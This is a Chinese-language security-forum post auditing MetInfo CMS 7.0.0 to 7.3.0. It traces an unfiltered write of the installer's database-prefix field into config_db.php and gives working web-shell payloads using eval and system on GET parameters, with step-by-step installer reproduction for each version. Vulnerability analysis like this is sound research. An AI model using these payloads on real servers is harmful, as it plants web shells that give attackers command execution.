奇安信攻防社区-米拓cms

米拓cms

Metinfocms命令执行前话：米拓企业建站系统是一款由长沙信息科技有限公司自主研发的免费开源企业级CMS，该系统拥有大量的用户使用，及对该款cms进行审计，如果利用CNVD-2021-01930进行进一...

Metinfocms命令执行  
前话：  
米拓企业建站系统是一款由长沙信息科技有限公司自主研发的免费开源企业级CMS，该系统拥有大量的用户使用，及对该款cms进行审计，如果利用CNVD-2021-01930进行进一步深入，其危害的严重性可想而知。  
审计过程：  
1.Index：拿到源码先看根目录的index.php看看都包含（加载）了什么文件。  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-c03fb7ee266e46c25638ca4590e6f69033cef869.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-c03fb7ee266e46c25638ca4590e6f69033cef869.png)  
2.关键词：在/app/system/entrance.php看到了配置文件的定义，全局搜索这个  
’PATH\_CONFIG‘参数。  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-0bdc29e99f17269162c39c5edd4db854159d9cde.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-0bdc29e99f17269162c39c5edd4db854159d9cde.png)  
全局搜索并找到install/index.php文件下有这个参数，点击跟进查看。  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-e22cfc75ce590d850fbc6a366cde692797c580f1.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-e22cfc75ce590d850fbc6a366cde692797c580f1.png)  
在这个文件的219行有个是接收db数据库参数的方法。  
官方说明“$\_M”数组：<https://doc.metinfo.cn/dev/basics/basics75.html>  
这里是接收from数据的db\_prefix参数。也就是“数据表前缀”内容的值。  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-c6176e64214801868737c0d06b466cad93560b5d.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-c6176e64214801868737c0d06b466cad93560b5d.png)  
往下发现是直接写入tableper然后赋值给config变量。

[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-2c2b06259b89cc5f0ada5f6d8f9db8f5cf33c3c7.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-2c2b06259b89cc5f0ada5f6d8f9db8f5cf33c3c7.png)

并在264行fopen打开/config/config\_db.php进行没有安全过滤的字节流（fputs）方式的写入。  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-ced2e8ce6176a850dd07e0b97f483e84f70fb14b.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-ced2e8ce6176a850dd07e0b97f483e84f70fb14b.png)  
影响版本：7.3.0 - 7.0.0  
一、进行7.3.0安装步骤，访问http://127.0.0.1/install/index.php  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-0d6983a65aa9efcebe38a77df5996dd3483b3285.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-0d6983a65aa9efcebe38a77df5996dd3483b3285.png)  
二、选中传统安装继续下一步  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-d0d3dc05c707292f72e3a29548a8123d33ab87e1.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-d0d3dc05c707292f72e3a29548a8123d33ab87e1.png)  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-4280a8104b427b3d2c75049a3664c7b13e3a4ab1.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-4280a8104b427b3d2c75049a3664c7b13e3a4ab1.png)  
三、数据库信息进行写shell  
代码执行Payload："*/@eval($\_GET\['1'\]);/*  
命令执行Payload："*/@system($\_GET\['1'\]);/*  
代码执行：  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-85fbb9783baf1653eb4d856f7c1273fc6d86b3f3.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-85fbb9783baf1653eb4d856f7c1273fc6d86b3f3.png)  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-f25324bacc38ce0d96b21d89f38fb096aff766e8.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-f25324bacc38ce0d96b21d89f38fb096aff766e8.png)  
点击保存进行下一步验证，出现这报错信息，可以查看config\\config\_db.php文件。  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-6604dafcea8d0d4f4631dd992c86e4314cd067d7.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-6604dafcea8d0d4f4631dd992c86e4314cd067d7.png)  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-1a8cd7a6bdeac497447da32a5f25904fa9462807.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-1a8cd7a6bdeac497447da32a5f25904fa9462807.png)  
成功写入  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-5f58fd7f4ce6833d93bcee16e76831a30c398e22.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-5f58fd7f4ce6833d93bcee16e76831a30c398e22.png)  
命令执行：  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-d85567a127d9dd98cf6f8b182b1a8178c7f8177d.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-d85567a127d9dd98cf6f8b182b1a8178c7f8177d.png)  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-a994addd1de11e8212f2d2c83397b1c3943898e0.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-a994addd1de11e8212f2d2c83397b1c3943898e0.png)  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-6182db58b0f8a8f87435512e74ebc35ca4f0f67b.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-6182db58b0f8a8f87435512e74ebc35ca4f0f67b.png)  
7.0.0版本：  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-54caf196d50d033c796bc9b1682900eb87963734.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-54caf196d50d033c796bc9b1682900eb87963734.png)  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-f52c2652760687b3a370f106e739efb0bcac1b1c.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-f52c2652760687b3a370f106e739efb0bcac1b1c.png)  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-06c82c50201ba243e8e9e28d1d5e3c58e4a02085.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-06c82c50201ba243e8e9e28d1d5e3c58e4a02085.png)  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-453a96c9bbdd9a5470430288f914a842395f1152.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-453a96c9bbdd9a5470430288f914a842395f1152.png)  
7.1.0版本：  
Payload："*/@eval($\_GET\['1'\]);@system($\_GET\['2'\]);/*  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-d20cda028493e956ca44df287734149bc4b36db1.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-d20cda028493e956ca44df287734149bc4b36db1.png)  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-d8c0a2fc7ef73fc43d8724949fbd5160ca7699e9.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-d8c0a2fc7ef73fc43d8724949fbd5160ca7699e9.png)  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-a74c4e5077e84b41fb048ed8d571fe28b8788272.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-a74c4e5077e84b41fb048ed8d571fe28b8788272.png)  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-ef92943e193c12699c997b7476187412be4b57d7.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-ef92943e193c12699c997b7476187412be4b57d7.png)  
7.2.0版本：  
Payload："*/@eval($\_GET\['1'\]);@system($\_GET\['2'\]);/*

[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-41f28bee1dc855b9b8f459858831480c981c7c06.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-41f28bee1dc855b9b8f459858831480c981c7c06.png)  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-a44918fc6d95b4d27d8e722bf1e25890cbf445ce.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-a44918fc6d95b4d27d8e722bf1e25890cbf445ce.png)  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-ed7c127d76d84388b23ace4a66c8b7b23da31a6a.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-ed7c127d76d84388b23ace4a66c8b7b23da31a6a.png)  
[![](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-990e6a381b39a60cb883b995ac62315ebd169181.png)](https://shs3.b.qianxin.com/attack_forum/2021/06/attach-990e6a381b39a60cb883b995ac62315ebd169181.png)

发表于 2021-06-30 12:32:00
阅读 ( 6496 )
分类：漏洞分析

1 条评论

Xc7ACD 2021-10-27 16:22

牛